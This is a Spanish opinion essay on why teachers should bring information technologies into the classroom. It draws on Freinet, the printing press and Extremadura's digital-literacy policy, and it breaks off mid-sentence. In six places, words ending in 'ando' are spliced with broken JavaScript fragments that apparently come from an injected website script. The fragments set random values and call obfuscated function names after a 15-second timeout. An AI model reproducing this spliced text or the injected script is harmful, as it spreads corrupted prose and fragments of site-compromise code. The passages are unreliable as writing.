UNA RAZÓN PARA UTILIZAR LAS TIC´S

Autora: Paula Sánchez Prieto

          Son muchos los docentes que, por diferentes razones, se resisten a utilizar los medios tecnológicos en el aula, argumentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que no es la herramienta más adecuada para adquirir las habilidades básicas culturales de expresión y comprensión oral y escrita, así como la lectura. Algunos piensan que estas habilidades básicas solo se pueden adquirir con la enseñanza tradicional de lápiz, papel y pizarra; lo cual no se discute, pero también es válido que convivan en el aula los recursos tradicionales con los actuales. Por este motivo, Extremadura ha sido pionera en considerar las TIC´s como pieza clave dentro de los procesos de aprendizaje y se ha propuesto que todos los alumnos, al finalizar la Educación Primaria, tengan una cultura básica digital.


          Otros docentes no están formados en  la tecnología, algo que  se podría solucionar recibiendo formación en horas lectivas. En el año 2002, el pedagogo Albero señalaba la necesidad de formar al profesorado en este campo debido a que, en muchos casos, los adolescentes tienen un nivel de conocimientos de estas tecnologías superior al de sus profesores.  Una respuesta a esta situación sería crear una campaña de información y formación adecuada para los alumnos, profesores y padres, basándose en dos perpectivas: una tecnológica y otra humanística, es decir, que atienda tanto a los medios como a los fines de la educación.


            Y así podríamos seguir enumerandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando diferentes razones: la distracción, la falta de concentración, dificultad para reflexionar, aislamiento, cansancio visual, sensación de desbordamiento, esfuerzo económico…razones que nos hacen dudar de su utilización.


          Pero hay una razón para utilizar los medios tecnológicos en el aula que debemos tener presente y que supera a las desventajas mencionadas anteriormente: estos forman parte de nuestra sociedad actual, y nuestro deber, como docentes, es acercar al alumno a la cultura actual y no a la cultura del ayer. Los niños comienzan a tener contactos con estos medios en los entornos educativos informales como los amigos o la familia.  Así pues, hay que preparar a los alumnos para adaptarse a la sociedad en la que han nacido.


          Acercar la tecnología a los alumnos es darle alas para integrarse en una sociedad desarrollada, y sabemos  que podrán hacerlo si les damos los medios y el aprendizaje.


           Hoy sabemos que los libros y la lectura cambiaron el mundo. Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando casi nadie sabía leer, el conocimiento lo tenían muy pocos. Toda la sabiduría se encontraba en monasterios e iglesias, en papiros, pergaminos y libros enormes e inaccesibles para la mayoría. Con la invención de la imprenta y la aparición del libro el conocimiento llegó a todas partes y el mundo se transformó: ya era imposible parar el saber. Hoy vivimos algo semejante con Internet y los ordenadores: una nueva forma de comunicarnos está cambiandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a la sociedad. Siempre que cambian los medios de comunicación, el mundo se transforma, y si el mundo se transforma es lógico que transformemos nuestra forma de enseñar. Preparar a los niños con las herramientas que van a necesitar es nuestra obligación. ¿Hubiese sido una locura que cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando apareció la imprenta un docente intentara llevar libros a los niños?


           Ya el pedagogo Freinet, a mediados del siglo pasado, llamaba la atención sobre la necesidad de poner la escuela “a tono con la vida”, refiriéndose con ello a las nuevas tecnologías. Por supuesto, las nuevas tecnologías en aquella época eran la imprenta, el correo, la radio… Para Freinet la escuela no podía permanecer aislada mientras que el mundo avanzaba y los estudiantes con él.


           Tenemos que tener en cuenta que, cada vez que se ha producido un avance en la manera de comunicarnos, la sociedad ha cambiado; no sólo en el  formato, sino también en las formas de expresión y hasta en el comportamiento. Hoy las distancias se han acortado, el acceso a la información es mucho más rápido, así como la posibilidad de tener a nuestro alcance a personas de todo el planeta, y esto ha constituido una revolución para el lenguaje de la que no somos suficientemente conscientes aún. Esto, además está transform